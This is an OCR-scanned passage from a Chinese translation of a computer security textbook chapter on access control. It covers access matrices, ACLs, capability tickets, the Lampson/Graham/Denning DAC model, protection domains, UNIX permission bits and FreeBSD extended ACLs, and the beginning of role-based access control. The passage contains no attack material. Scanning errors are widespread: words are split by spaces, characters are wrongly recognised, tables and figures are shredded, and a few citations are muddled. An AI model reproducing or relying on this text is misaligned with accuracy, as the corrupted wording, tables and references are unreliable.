息 的 实体 。 实 例 包括 记录、 块 (block) W., Et (segment)、 文 件 、 部 分 文件 (portions of files), 
目录 、 目 录 树 、 邮 箱 、 消 息 和 程序 等 。 一 些 访问 控制 系统 还 包括 比特 、 字 节 、 字 、 处 理 器 、 通 
信 端 口 、 时 钟 和 网 络 节点 。 
被 访问 控制 系统 保护 的 客体 的 数量 和 类 型 取决 于 访问 控制 运行 的 环境 及 在 安全 性 方面 与 复 
如 性 、 处 理 器 负载 、 易 用 性 方面 之 间 期 望 达 到 的 平衡 。 
访问 权 (access right) 描述 了 主体 可 以 访问 客体 的 方式 。 可 以 包括 下 列 内 容 : 
o 读 (read): 用 户 可 以 查看 系统 资源 (如 文件 、 文 件 中 的 选 定 记录 、 记 录 中 的 选 定 字段 
或 者 某 种 组 合 ) 的 信息 。 读 权限 包括 复制 或 打印 的 能 力 。 
e 写 (write): 用 户 可 以 添加 、 修 改 或 删除 系统 资源 (如 文件 、 记 录 、 程 序 ) 的 数据 。 写 
权限 包括 读 权 限 。 
执行 (execute): 用 户 可 以 执行 指定 的 程序 。 
HIER (delete): 用 户 可 以 删除 茶 个 系统 资源 ， 如 文件 或 记录 。 
fil (create): 用 户 可 以 创建 新 的 文件 、 记 录 或 字段 。 
搜索 (search): 用 户 可 以 列 出 目录 中 的 文件 或 者 搜索 目录 。 


4.3 和 目 主 访问 控制 


如 前 所 述 ， 上 自主 访问 控制 方案 是 指 一 个 实体 可 以 被 授权 按 其 自己 的 意志 使 另 一 个 实体 能 

够 访问 某 些 资源 。DAC 的 一 种 通常 方 式 是 在 操作 系统 或 数据 库 管 理 系统 中 运用 的 访问 和 矩阵 
(access matrix) 。 访 问 和 矩阵 的 概念 由 Lampson [LAMP69，LAMP71] 系统 提出 ， 随 后 由 Graham 
与 Denning [GRAH72]、Harrison 等 人 [HARR76] 细 化 。 

和 矩阵 中 的 一 维 由 试图 访问 资源 的 被 标识 的 主体 组 成 。 这 个 列表 一 般 由 用 户 或 用 户 组 组 成 ， 
尽管 除了 用 户 之 外 ,也 可 以 控制 对 终端 、 网 络 设 备 、 主 机 或 应 用 的 访问 。 另 一 维 列 出 可 以 被 访 
问 的 客体 。 在 细节 最 多 的 级 别 ， 客 体 可 以 是 一 个 数据 字段 。 更 聚集 的 分 组 如 记录 、 文 件 甚至 整 
个 数据 库 也 都 可 以 作为 矩阵 中 的 客体 。 和 矩阵 中 的 每 项 表示 一 个 特定 主体 对 一 个 特定 客体 的 访 
问 权 。 

图 4-2a 基于 [SAND94] 中 的 一 幅 图 ， 是 访问 矩阵 的 一 个 简单 例子 。 由 图 可 知 ， 用 户 
A 拥 有 文件 1 和 3 并 具有 对 这 些 文 件 的 读 、 写 权限 ， 用 户 B 具有 对 文件 1 的 读 权 限 ， 依 此 
类 推 。 

实践 当中 ， 访 问 窍 阵 通 党 是 稀疏 的 ， 可 以 用 下 面 两 种 方式 之 一 分 解 。 将 罕 阵 按 列 分 解 ， 产 
HE Hh (0) #2 ll HE (Access Control List, ACL), IEI 4-2b。 对 于 每 个 客体 ，ACL 列 出 用 户 及 其 被 
允许 的 访问 权 。ACL 可 以 包含 一 个 默认 的 (或 公有 的 ) 项 ， 使 得 没有 显 式 列 出 具有 特殊 权限 的 
用 户 拥有 一 组 默认 的 权限 。 这 组 默认 的 权限 应 该 总 是 最 小 特权 或 者 只 读 权 限 两 类 中 可 用 的 一 
类 。 列 表 的 元 素 可 以 包括 单个 用 户 ， 也 包括 用 户 组 。 
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客体 
文件 ”文件 。 ”文件 ”文件 4 









Wi 
文件 1 AL B 用 户 A 文件 1 文件 3 
we "PPR 
o PE ~ ale 
文件 4 c) a 中 文件 的 能 力 表 





b) a 中 文件 的 访问 控制 表 
图 4-2 访问 控制 结构 实例 


因为 每 个 ACL 提供 了 一 个 指定 资源 的 信息 ， 所 以 当 想 要 确定 哪个 主体 对 某 个 资源 具有 哪 
些 访问 权时 ,使 用 ACL 很 方便 。 然 而 ， 这 种 数据 结构 对 于 确定 一 个 特定 用 户 可 以 使 用 的 访问 
权 并 不 方便 。 

按 行 分 解 产 生 能 力 权 证 (capability ticket)， 见 图 4-2c。 能 力 权证 用 来 指定 一 个 用 户 的 授权 
客体 和 操作 。 每 个 用 户 有 许多 权证 ， 可 以 经 系统 授权 将 其 借 给 或 转让 给 其 他 用 户 。 因 为 权证 可 
能 分 散在 系统 中 ， 所 以 产生 了 一 个 比 访问 控制 表 更 严重 的 安全 问题 ， 就 是 权证 一 定 不 可 伪造 。 
解决 这 个 问题 的 一 种 办 法 是 让 操作 系统 持 有 代表 用 户 的 所 有 权证 ， 将 这 些 权 证 保存 在 用 户 不 能 
访问 的 一 块 内 存 区 域 。 另 一 种 办 法 是 在 能 力 权 证 中 包含 一 个 不 可 伪造 的 权 标 (token), EFT RE 
是 一 串 很 长 的 随机 口令 ,或 者 是 一 段 密码 学 消息 认证 码 。 该 值 当 相关 的 资源 被 请 求 访问 时 得 到 
验证 。 这 种 形式 的 能 力 权 证 适用 于 内 容 安 全 得 不 到 保证 的 分 布 式 环境 。 

能 力 权 证 的 方便 与 不 方便 之 处 与 ACL 正好 相反 。 它 很 容易 确定 一 个 指定 用 户 所 拥有 的 访 
问 权 集合 ， 但 要 确定 对 特定 资源 具有 指定 访问 权 的 用 户 列表 则 要 困难 得 多 。 

[SAND94] 提出 了 一 种 数据 结构 ， 它 不 像 访 问 和 矩阵 那么 稀 跑 ,但 比 ACL 或 能 力 表 更 为 方 
(i (K 4-2 )。 授 权 表 中 的 一 行 对 应 于 一 个 主体 对 一 种 资源 的 一 种 访问 权 。 按 主体 排序 或 访问 该 
表 等 价 于 能 力 表 。 按 客体 排序 或 访问 该 表 等 价 于 ACL。 关 系数 据 库 很 容易 实现 这 种 类 型 的 授 
权 表 。 
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4-2 图 4-2 中 文件 的 授权 表 


主体 客体 
om | XH | s» | we | xf 

O s | we | w 

O s | a | om 

| omw | m 文件 1 

i 文件 1 

TE 
Read sth 
[own | m | c | ra st 
文 作 4 


4.3.1 一 个 访问 控制 模型 


本 节 介 绍 由 Lampson、Graham 和 Denning [LAMP71, GRAH72, DENN71] 开发 的 一 个 
DAC 通用 模型 。 该 模型 假定 了 一 组 主体 、 一 组 客体 以 及 一 组 控制 主体 访问 客体 的 规则 。 我 们 
把 系统 的 保护 状态 定义 为 在 一 定 的 时 间 点 指定 每 个 主体 对 每 个 客体 的 访问 权 的 信息 集 。 我 们 可 
以 识别 出 三 种 需求 :表示 保护 状态 、 执 行 访问 权 以 及 允许 主体 以 某 些 方 式 更 改 保护 状态 。 该 模 
型 给 出 了 DAC 系统 的 一 个 通用 的 逻辑 描述 ， 满 足 所 有 这 三 种 需求 。 
为 了 表示 保护 状态 ， 我 们 将 访问 控制 矩阵 中 的 客体 全 域 扩 展 到 包括 下 列 对 象 
o 进程 (process): 访问 权 包 括 删除 、 中 止 (BASE) 和 唤醒 进程 的 能 力 。 
© if (device); 访问 权 包 括 读 / 写 设备 、 控 制 设备 操作 (如 磁盘 寻 道 ) 和 封锁 /解锁 设 
备 使 用 的 能 力 。 

e 存储 单元 或 区 域 (memory location or region): 访问 权 包括 读 / 写 存储 区 域 的 某 些 受到 保 
护 从 而 在 默认 状态 下 不 允许 被 访问 的 单元 的 能 力 。 

© +f (subject): 对 主体 的 访问 权 与 授予 或 删除 该 主体 对 其 他 客体 的 访问 权 的 能 力 有 关 ， 
如 后 文 所 述 。 

图 4-3 是 一 个 实例 。 对 于 访问 控制 矩阵 4， 其 中 的 每 一 项 ALS, X] 都 包含 被 称 为 访问 属性 的 
字符 串 ， 用 来 指定 主体 8 对 客体 蕊 的 访问 权 。 例 如 ， 在 图 4-36, S 可 以 读 取 文件 成 ， 因 为 
“read” 出 现在 ALS), Fi] 中 。 
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图 4-3 扩展 的 访问 控制 矩阵 9 


O 图 4-3 中 各 访问 权 的 中 文 含 义 为 : control 控制 ; owner 拥有 ; read 读 ; write 写 ; execute 执行 ; wakeup 唤醒 ; 


stop "Pik; seek 寻 道 。 一 一 译 者 注 


BAF WHE Bi 


从 逻辑 或 功能 的 观点 来 看 ， 分 离 的 访问 控制 模块 与 每 种 客体 类 型 相关 联 (图 4-4 )。 该 模块 
评估 主体 访问 客体 的 每 个 请 求 ， 以 确定 访问 权 是 否 存 在 。 一 次 访问 尝试 将 触发 下 列 步骤 : 
1. 主体 5 对 客体 XX 发 出 类 型 为 a 的 请 求 。 













主体 访问 控制 机 制 
r read F i (S, read, F) ; 文件 | 
i I 系统 
i 
i 
I 
1 
I 
l 1 
l l 
| -一 -一 
wakeup P (S,, wakeup, P) 
I 1 
1 | 
I 1 
i I 
i 
I i 
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I I 
| 
i 
1 | 
grant ato $,, X | !(S, grant, a, S,,X) | 
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5 delete 2 from S,, Y 1(S.. delete, £, S, Y) | 访问 矩阵 
监视 器 时 | ni 
| 
! I 
| | 
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图 4-4 访问 控制 功能 的 组 织 结构 


2. 该 请 求 导致 系统 (操作 系统 或 某 种 类 型 的 访问 控制 接口 模块 ) 为 忒 的 控制 器 生成 形 如 
(So, a, X) 的 消息 。 

3. 控制 器 询问 访问 和 矩阵 4， 以 确定 wx 是 否 在 ATS), XA 中 。 如 果 在 ， 人 允许 访问 ; 否则 ， 拒 绝 
访问 ， 保 护 违例 出 现 。 该 违例 将 触发 警告 及 适当 的 动作 。 

图 4-4 提出 主体 对 客体 的 每 次 访问 都 通过 该 客体 的 控制 器 完成 。 控 制 器 的 决定 取决 于 和 矩阵 
的 当前 内 容 。 此 外 ， 某 些 主体 具有 对 访问 和 矩阵 进行 特定 修改 的 权力 。 修 改 访问 矩阵 的 请 求 被 看 
作对 矩阵 的 一 次 访问 ， 其 中 将 和 矩阵 的 单个 项 作为 客体 。 这 些 访问 通过 控制 矩阵 更 新 的 访问 矩阵 
控制 锅 完 成 。 

这 个 模型 还 包括 控制 修改 访问 和 矩阵 的 一 组 规则 ， 如 表 4-3 所 示 。 在 该 表 中 ， 我 们 引入 
了 “owner” 和 “control” 访 问 权 以 及 复制 标志 (copy flag) 的 概念 ， 下 面 会 详细 解释 这 些 
内 容 。 


表 4-3 访问 控制 系统 命令 
RI transfer {© } to 5, x |” EBKEN ALS, XI t 
R2 grii Gi to S, X 将 人 ”| 存储 到 4[S, 加 中 
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(BE) 


“control” FE A[So, X] 中 
或 


R3 delete a from S, X 从 ALS, X) PHBR a 





“owner” FE A[So, X] 中 


“control” FE 4[su X] 中 
R4 w read S, x 或 复制 A[So, X] 到 | w 
“owner” 在 A[So, X] 中 


无 
| , X] P 
在 4 中 插入 5S 对 应 的 行 ， 执行 create 
R7 create subject S 无 object S; 将 “control” 存 储 到 A[S, S] 
中 
” e A 7 = SX \) AT: 行 destr 
R8 destroy subject S “owner” 7E A[So, X] 中 bes i 删除 5 对 应 的 行 ， 执 行 destroy 


前 三 个 规则 用 来 处 理 转 授 、 授 予 和 删除 访问 权 。 假 设 项 a* FEF AS, 中。 这 意味 着 
So 对 客体 大 具有 访问 权 ， 并 且 由 于 复制 标志 的 存在 ， 可 以 把 这 个 访问 权 带 或 不 带 复制 标志 地 
转 授 给 男 一 个 主体 。 规 则 R1 就 表示 这 种 能 力 。 如 果 主 体 认为 其 转 授 访 问 权 的 新 主体 将 恶意 地 
把 访问 权 转 授 给 男 一 个 不 应 该 具有 访问 权 的 主体 ， 它 可 以 不 带 复 制 标志 地 转 授 访问 权 。 例 如 ， 
S, 可 以 在 Fi 列 的 任何 矩阵 项 中 填 人 “read” 或 “ read*”。 规 则 R2 规定 ， 如 果 Sy 被 指定 为 客 
(AX IN ATA A, IBA So 可 以 将 该 客体 的 访问 权 授 予 任何 其 他 主体 。 规 则 R2 说 明 如 果 S 具有 
ITXI “owner” W, HBA So 可 以 对 任何 SS， 添加 任何 访问 权 到 ALS, X 中。 规则 R3 允许 





. 50 删除 其 控制 的 主体 所 在 行 或 其 拥有 的 客体 所 在 列 中 的 任何 矩阵 项 的 任何 访问 权 。 规 则 R4 Fe 


许 主体 读 取 其 拥有 或 控制 的 矩阵 部 分 。 

K 4-3 中 的 其 余 规则 用 来 控制 主体 和 客体 的 创建 与 删除 。 规 则 Rs 规定 任何 主体 都 能 创建 
新 的 客体 ， 继 而 拥有 该 客体 并 能 授予 、 删 除 对 其 的 访问 权 。 按 照 规则 R6， 客 体 的 所 有 者 可 以 
销毁 该 客体 ， 继 而 删除 访问 和 矩阵 的 相应 列 。 规 则 R7 使 得 任何 主体 能 够 创建 新 的 主体 ， 创 建 者 
于 是 拥有 新 主体 ， 而 新 主体 可 以 控制 对 其 自身 的 访问 。 规 则 RS 允许 主体 的 所 有 者 删除 访问 矩 
阵 中 该 主体 对 应 的 行 和 列 (如 果 有 主体 列 的 话 )。 

K 4-3 中 的 规则 集 是 为 访问 控制 系统 定义 的 规则 集 的 一 个 实例 。 下 面 是 可 以 包括 的 附加 规 
则 或 替代 规则 的 实例 。 可 以 定义 只 转 权 (transfer-only right)， 用 来 使 转 授 的 权限 添加 到 目标 主 
体 或 从 转 授 主体 删除 。 通 过 不 允许 伴随 所 有 权 出 现 复制 标记 ， 可 以 将 客体 或 主体 的 所 有 者 的 数 
目 限 制 到 一 个 。 

一 个 主体 创建 男 一 个 主体 并 对 该 主体 具有 “owner” 访 问 权 的 能 力 可 以 用 来 定义 主体 层次 。 
例如 ， 在 图 4-3 F, S HA S M S, EE S F S Z S 管理。 根据 表 4-3 中 的 规则 ，S' 可 以 授 
予 和 删除 它 已 具有 的 对 S 的 访问 权 。 因 而 ,一 个 主体 可 以 创建 男 一 个 权限 为 其 本 身 访问 权 的 
子 集 的 主体 。 这 可 能 很 实用 。 例 如 ， 如 果 一 个 主体 正在 调用 一 个 并 不 完全 可 信 的 应 用 ， 那 它 就 
不 想 让 该 应 用 能 给 其 他 主体 转 授 访问 权 。 


4.3.2 ”保护 域 


我 们 到 目前 为 止 讨 论 的 访问 控制 矩阵 模型 是 把 一 组 能 力 和 用 户 关联 起 来 。[LAMP71] 提出 
了 一 种 更 一 般 、 更 灵活 的 方法 ， 就 是 把 能 力 和 保护 域 关联 起 来 。 保 护 域 (protection domain) 是 
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们 都 把 每 一 行 等 同 于 一 个 特定 用 户 。 因 此 ， 在 这 个 受 限 模型 中 ， 每 个 用 户 具 有 一 个 保护 域 ， 并 
且 该 用 户 创 建 的 任何 进程 都 具有 同一 保护 域 定 义 的 访问 权 。 

保护 域 这 个 更 一 般 的 概念 用 来 提供 更 多 的 灵活 性 。 例 如 ， 用 户 可 以 通过 定义 一 个 新 的 保护 
域 来 创建 权限 为 其 访问 权 子 集 的 进程 。 这 就 限制 了 进程 的 能 力 。 服 务 器 进程 可 以 使 用 这 一 方案 
来 为 不 同类 别 的 用 户 创 建 进程 。 而 且 ， 用 户 也 可 以 为 不 能 完全 信任 的 程序 定义 一 个 保护 域 ， 以 
便 将 该 程序 的 访问 限制 在 用 户 访问 权 的 一 个 安全 子 集 中 。 

进程 与 保护 域 之 间 的 关联 可 以 是 静态 的 ， 也 可 以 是 动态 的 。 例 如 进程 可 以 执行 一 个 过 程序 
列 ， 对 其 中 每 个 过 程 要 求 不 同 的 访问 权 。 一 般 地 ， 我 们 愿意 最 小 化 任何 用 户 或 进程 在 任何 一 次 
访问 中 的 访问 权 。 保 护 域 的 使 用 为 满足 这 个 要 求 提 供 了 一 种 简单 的 方式 。 

保护 域 的 一 种 形式 与 很 多 操作 系统 (如 UNIX) 的 用 户 与 内 核 模式 的 区 别 有 关 。 用 户 程 序 
运行 于 用 户 模 式 ( user mode)， 不 能 使 用 某 些 受 保护 的 内 存 区 域 ， 且 不 能 执行 某 些 指令 。 当 用 
户 进程 调用 系统 例 程 时 ， 那 个 例 程 运行 于 系统 模式 ， 或 者 叫 内 核 模 式 (kernel mode)， 其 能 够 
执行 特权 指令 ， 并 能 访问 受 保 护 的 内 存 区 域 。 


4.4 实例 : UNIX 文件 访问 控制 


为 了 讨论 UNIX 文件 访问 控制 ， 需 要 介绍 一 些 关 于 UNIX 文件 和 目录 的 基本 概念 。 

所 有 类 型 的 UNIX 文件 都 由 操作 系统 通过 inode 管理 。inode (index node， 索 引 节点 ) 是 包 
含 操作 系统 对 一 个 文件 所 需 的 关键 信息 的 控制 结构 。 几 个 文件 名 可 以 与 一 个 inode 关联 ， 但 一 
个 活动 inode 仅 与 一 个 文件 关联 ， 一 个 文件 也 仅 被 一 个 inode 控制 。 文 件 的 属性 及 访问 许可 和 
其 他 控制 信息 都 存储 在 inode 中 。 在 磁盘 上 有 个 inde 表 ， 其 中 包含 了 文件 系统 中 所 有 文件 的 
inode。 打 开 一 个 文件 时 ， 它 的 inode 被 读 进 主 存 ， 存 储 在 驻 留 内 存 的 inode 表 中 。 

目录 呈 分 层 树 状 结构 。 每 个 目录 包含 文件 或 其 他 目录 。 包 含 在 另 一 个 目录 中 的 目录 被 称 为 
子 目 录 。 目 录 仅 仅 是 一 个 包含 文件 名 和 指 癌 关联 inode 的 指针 的 列表 。 因 而 ， 每 个 目录 都 与 自 
己 的 inode 关联 。 


4.4.1 ”传统 的 UNIX 文件 访问 控制 


大 多 数 UNIX 系统 都 依赖 于 或 者 至 少 是 基于 UNIX 早期 版 本 引入 的 文件 访问 控制 方案 。 每 
个 UNIX 文件 被 分 配 一 个 唯一 的 用 户 标识 号 (user identification number, user ID )。 用 户 是 主 
组 的 成 员 ， 还 可 能 是 其 他 许多 用 组 ID 标识 的 组 的 成 员 。 创 建文 件 时 ， 指 定 一 个 用 户 拥有 该 文 
件 ， 并 用 该 用 户 的 ID 标识 这 个 文件 。 文 件 还 属于 一 个 特定 组 ， 组 的 初 值 是 文件 创建 者 的 主 组 
或 其 父 目 录 的 属 组 ( 当 SetGID 许可 置 位 时 )。 与 每 个 文件 相关 联 的 是 12 个 保护 位 的 组 合 。 属 
ID, JEH ID 和 保护 位 都 是 文件 inode 的 一 部 分 。 

9 个 保护 位 分 别 用 来 指定 文件 属 主 、 同 组 用 户 与 其 他 用 户 的 读 、 写 和 执行 许可 。 这 就 形成 
了 所 有 者 、 同 组 用 户 和 其 他 用 户 的 层次 结构 ， 且 使 用 其 中 最 相关 的 许可 集 。 图 4-5a 给 出 了 
一 个 例子 ， 其 中 文件 属 主 具有 读 和 写 权 限 ， 同 组 用 户 具 有 读 权 限 ， 其 他 用 户 没 有 任何 访 
问 权 。 保护 位 应 用 到 目录 时 ， 读 、 写 位 分 别 用 来 授予 列表 和 创建 / 重 命 名 /删除 文件 的 权 
限 9， 执 行 位 用 来 授予 进入 目录 或 在 目录 中 搜索 文件 名 的 权限 。 


日 ” 注意， 日 录 的 权限 与 该 目录 包含 的 任何 文件 或 子 目 录 的 权限 是 不 同 的 。 用 户 对 目录 具有 写 权 限 并 不 意味 着 
他 对 目录 中 的 文件 具有 写 权 限 。 这 是 由 特定 文件 的 权限 控制 的 。 然 而 ,该 用 户 具 有 重 命名 文件 的 权限 。 
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eta etre ae 


user: TEW- 


group: ¢r-- 





other::--- 


a) 传统 的 UNIX 方 法 ( 最 小 访问 控制 列表 ) 


user: :rw- 
user: joe: rw- 
被 掩 项 


group: :r-- 


mask: :rw- 





other ?<=== 
b) 扩展 的 访问 控制 列表 
图 4-5 UNIX 文件 访问 控制 


剩余 的 3 个 位 定义 了 文件 或 目录 的 其 他 特殊 行为 。 其 中 两 个 是 “设置 用 户 ID ”( SetUID ) 
和 “设置 组 ID”(SetGID) 许可 。 如 果 对 一 个 可 执行 文件 设置 这 些 位 ， 操 作 系 统 会 按 下 面 方式 
运行 。 当 用 户 (具有 该 文件 的 执行 权 ) 执行 该 文件 时 ， 系 统 会 临时 把 文件 创建 者 的 用 户 ID 或 
文件 属 组 的 权限 分 配给 执行 该 文件 的 用 户 。 这 些 被 认为 是 在 对 程序 制定 访问 控制 决策 ， 此 时 ， 
执行 程序 的 用 户 除 了 “真实 的 用 户 ID ”和 “真实 的 组 ID ”之 外 使 用 “有 效 的 用 户 ID” 和 “有 
效 的 组 ID” 。 这 个 改变 仅 当 程序 运行 时 有 效 。 该 特征 使 我 们 能 够 创建 和 使 用 正常 情况 下 能 访问 
其 他 用 户 不 能 访问 的 文件 的 特权 程序 ， 还 能 使 用 户 能 在 受 控 方式 下 访问 某 些 文件 。 另 外 ， 当 这 
两 个 许可 位 应 用 到 目录 时 ，SetGID 许可 表示 新 创建 的 文件 将 继承 该 目录 的 属 组 ，SetUID 许可 
被 忽略 。 

最 后 一 个 许可 位 是 “ 黏 清 ”(sticky) 位 。 当 对 文件 设置 该 位 时 ， 最 初 表示 系统 应 在 文件 执行 
后 将 其 内 容 保留 在 内 存 中 ， 现 在 已 不 使 用 。 然 而 当 该 位 应 用 到 目录 时 ， 则 指出 只 有 该 目录 中 任 
何 文件 的 属 主 才 可 以 重 命 名 、 移 动 或 删除 那个 文件 。 这 对 管理 共享 的 临时 目录 中 的 文件 十 分 
有 用 。 

有 一 个 特殊 的 用 户 ID 被 指定 为 “超级 用 户 ”。 超 级 用 户 不 受 通常 的 文件 访问 控制 限制 ， 
具有 系统 范围 的 访问 权 。 任 何 被 超级 用 户 拥有 (或 设置 SetUID 到 超级 用 户 ) 的 程序 实际 上 对 
执行 该 程序 的 任何 用 户 授 予 了 无 限制 的 访问 权 。 因 此 在 编写 这 样 的 程序 时 一 定 要 非常 小 心 。 

当 文件 访问 需求 与 用 户 和 中 等 数目 的 用 户 组 联系 在 一 起 时 ， 这 种 访问 机 制 是 足够 的 。 例 
如 ， 假 设 一 个 用 户 想 给 用 户 A 和 B 授予 对 文件 X 的 读 权 限 ， 给 用 户 B 和 C 授予 对 文件 Y 的 
读 权 限 。 我 们 至 少 需要 两 个 用 户 组 。 用 户 B 为 了 访问 两 个 文件 需要 同时 属于 这 两 个 组 。 然 而 ， 
如 果 大 量 不 同 组 的 用 户 需 要 对 不 同文 件 的 一 系列 访问 权 ， 那 就 需要 数目 非常 大 的 组 来 提供 支 
持 。 这 即使 可 行 9， 也 会 很 快 变 得 难于 管理 。 解 决 这 个 问题 的 一 种 办 法 是 使 用 大 多 数 现代 
UNIX 系统 提供 的 访问 控制 表 。 

最 后 一 点 要 指出 的 是 ， 传 统 文 件 访问 控制 方案 实现 了 简单 的 保护 域 结 构 。 域 和 用 户 关 联 ， 
切换 域 对 应 于 临时 改变 用 户 ID。 


O 大 多 数 UNIX 系统 对 用 户 所 属 组 的 最 大 数目 以 及 系统 中 人 允许 的 组 的 总 数 有 硬性 限制 。 


4.4.2 UNIX 中 的 访问 控制 列表 


很 多 现代 UNIX 及 基于 UNIX 的 操作 系统 都 支持 访问 控制 列表 ， 其 中 包括 FreeBSD, 
OpenBSD 、Linux 和 Solaris。 本 节 将 描述 FreeBSD 中 的 访问 控制 列表 ， 不 过 其 他 实现 在 本 质 上 
也 具有 相同 的 特征 和 接口 。 这 种 特征 被 称 为 扩展 的 访问 控制 列表 ， 而 传统 UNIX 方法 被 称 为 最 
小 访问 控制 列表 。 

FreeBSD 人 允许 管理 员 通过 setfacl 命令 为 文件 分 配 一 个 UNIX 用户 ID 和 组 的 列表 。 任 何 数 
目的 用 户 和 组 都 可 以 通过 三 个 保护 位 ( 读 、 写 、 执 行 ) 与 文件 关联 ， 这 提供 了 分 配 访问 权 的 
一 种 灵活 机 制 。 文 件 不 是 必须 具有 ACL， 也 可 以 仅 用 传统 的 UNIX 文件 访问 机 制 保护 文件 。 
FreeBSD 文件 包括 一 个 附加 的 保护 位 ， 用 来 指出 文件 是 否 具 有 扩展 的 ACL. 

FreeBSD 和 大 多 数 UNIX 实现 都 支持 扩展 ACL 使 用 下 面 的 策略 (如 图 4-5b 所 示 ): 

1.9 位 许可 字段 中 的 属 主 类 和 其 他 类 项 目 与 最 小 ACL 中 的 含义 相同 。 

2. 属 组 类 项 目 指定 了 属 组 对 该 文件 的 访问 许可 。 这 些许 可 还 代表 可 以 分 配给 属 主 之 外 的 命 
名 用 户 或 命名 组 的 最 大 访问 许可 。 在 后 一 个 角色 中 ， 属 组 类 项 目 起 到 掩 码 的 作用 。 

3. 附加 的 命名 用 户 和 命名 组 可 以 通过 3 位 许可 字段 与 文件 关联 。 将 命名 用 户 或 命名 组 的 许 
可 与 掩 码 字 段 相 比 较 ， 任 何不 在 掩 码 字 段 中 出 现 的 许可 都 不 被 允许 。 

当 一 个 进程 请 求 访问 文件 系统 对 象 时 ， 需 要 执行 两 个 步骤 。 第 一 步 ， 选 择 与 请 求 进程 最 佳 
匹配 的 ACL 项 。ACL 项 按 如 下 顺序 查找 : 属 主 、 命 名 用 户 、 属 组 或 命名 组 、 其 他 用 户 。 仅 由 
其 中 一 项 确定 访问 权 。 第 二 步 ， 检 验 匹 配 项 是 否 包 含 足 够 的 许可 。 一 个 进程 可 以 是 多 个 组 的 成 
员 ， 因 此 可 能 与 多 个 组 项 匹配 。 如 果 这 些 匹配 的 组 项 中 有 一 项 包含 请 求 的 许可 ， 就 从 包含 请 求 
许可 的 项 中 选用 一 项 (不 管 选用 哪 项 ， 结 果 都 是 相同 的 )。 如 果 匹 配 的 组 项 中 没有 一 项 包含 请 
求 的 许可 ， 则 不 管 选用 哪 项 ， 访 问 都 将 被 拒绝 。 


45 基于 角色 的 访问 控制 


传统 的 DAC 系统 定义 了 单独 的 用 户 和 用 户 组 的 访问 权 。 与 之 相反 ，RBAC 基于 用 户 在 
系统 中 设 定 的 角色 而 不 是 用 户 的 身份 。 一 般 地 ， 角色 资源 
RBAC 模型 定义 角色 为 组 织 中 的 一 项 工作 职责 。 
RBAC 系统 给 角色 而 不 是 给 单独 的 用 户 分 配 访问 
权 。 反 过 来 ， 用 户 根 据 他 们 的 职责 被 静态 地 或 动 
态 地 分 配给 不 同 的 角色 。 

RBAC 现 已 得 到 广泛 的 商业 应 用 ， 并 且 依 然 
是 一 个 活跃 的 研究 领域 。 美 国 国家 标准 与 技术 研 
究 所 (National Institute of Standards and Technology, 
NIST) 已 经 发 布 一 个 标准 一 一 FIPS PUB 140-3 ( # 
码 模 块 安全 要 求 ，2009 年 9 月 )， 要 求 通过 角色 
支持 访问 控制 和 管理 。 

用 户 与 角色 的 关系 是 多 对 多 的 ， 角 色 与 资源 
或 系统 对 象 的 关系 也 是 多 对 多 的 (图 4-6 )。 在 某 
些 环境 下 ， 用 户 集 改 变频 繁 ， 给 一 个 用 户 分 配 一 


”角色 3 — = 
个 或 多 个 角色 的 方案 可 能 也 是 动态 的 。 在 大 多 数 De 
环境 下 ， 角 色 集 可 能 是 静态 的 ， 仅 有 偶尔 的 添加 A. 


或 删除 。 每 个 角色 对 一 个 或 多 个 资源 具有 特定 的 图 4-6 有 用户、 角色 与 资源 
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访问 权 。 资 源 集 和 与 某 个 角色 关联 的 特定 访问 权 也 可 能 很 少 改 变 。 

我 们 可 以 用 访问 矩阵 来 简单 描述 RBAC 系统 中 的 关键 元 素 ， 如 图 4-7 所 示 。 上 面 的 矩阵 
将 单个 用 户 与 角色 联系 起 来 。 一 般 情 况 下 用 户 比 角色 多 得 多 。 每 个 矩阵 项 或 者 为 空 ， 或 者 被 标 
记 ， 后 者 表示 该 用 户 被 分 配给 该 和 角色。 注意， 一 个 用 户 可 以 被 分 配 多 个 角色 一行 中 的 标记 多 
于 一 个 )。 下 面 的 矩阵 具有 与 DAC 访问 控制 矩阵 相同 的 结构 ， 其 中 将 角色 作为 主体 。 一 般 地 ， 
角色 少 而 客体 或 资源 多 。 在 这 个 和 矩阵 中 ， 和 矩阵 项 是 角色 享有 的 特定 访问 权 。 注 意 角 色 也 可 作为 
客体 ， 用 来 定义 角色 层次 。 


a ee 





P, D; D3 





图 4-7 RBAC 的 访问 控制 矩阵 表示 


RBAC 有 助 于 有 效 地 实现 第 1 章 提 到 的 最 小 特权 原则 。 每 个 角色 应 该 包含 其 所 需要 的 访问 
权 的 最 小 集 。 给 用 户 分 配 适 当 的 角色 ,使 其 仅 能 完成 那个 角色 要 求 的 工作 。 分 配 相同 角色 的 多 
个 用 户 共 享 相 同 的 访问 权 最 小 集 。 


RBAC 参考 模型 


通用 RBAC 方法 包括 很 多 功能 和 服务 。 为 了 阐述 RBAC 的 各 个 方面 ， 有 必要 定义 关于 
RBAC 功能 性 的 一 组 抽象 模型 。 
[SAND96] 定义 了 一 组 参考 模型 ， 其 已 成 为 正在 进行 的 标准 化 工作 的 基础 。 该 家 族 包 括 四 
个 互相 联系 的 模型 ， 如 图 4-8a 和 表 4-4 所 示 。RBAC 包含 RBAC 系统 的 最 小 功能 。RBAC 包 
括 RBAC 的 功能 ， 并 增加 了 角色 层次 ， 使 得 一 个 角色 能 够 继承 另 一 个 角色 的 许可 。RBAC: 包 
括 RBAC。， 并 增加 了 约束 ， 来 限制 配置 RBAC 系统 组 件 的 方式 。RBAC; 包含 RBACo、RBAC， 
和 RBAC; 的 所 有 功能 。 
基本 模型 一 一 RBAC。 图 4-8b 除去 角色 层次 和 约束 之 外 的 部 分 ， 包含 RBAC。 系统 中 4 种 
类 型 的 实体 : 
e FAR (user): 访问 该 计算 机 系统 的 个 体 。 每 个 个 体 都 有 一 个 与 之 关联 的 用 户 ID。 
© HË (role): 组 织 内 部 控制 该 计算 机 系统 的 命名 工作 职能 。 一 般 地 ， 与 每 个 角色 关联 
的 是 对 该 角色 及 担任 该 角色 的 任何 用 户 所 被 授予 的 权限 与 职责 的 描述 。 
e 许可 (permission): 对 一 个 或 多 个 客体 的 特定 访问 模式 的 认可 。 与 访问 权 (access 
right)、 特 权 (privilege) 和 授权 (authorization) 是 同义词 。 
e 会 话 (session): 用 户 与 其 被 分 配 的 角色 集 的 激活 子 集 的 映射 。 
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图 4-8b 中 的 实 线 表示 关系 (GB), AEA aR, WTKR. RR, HP 
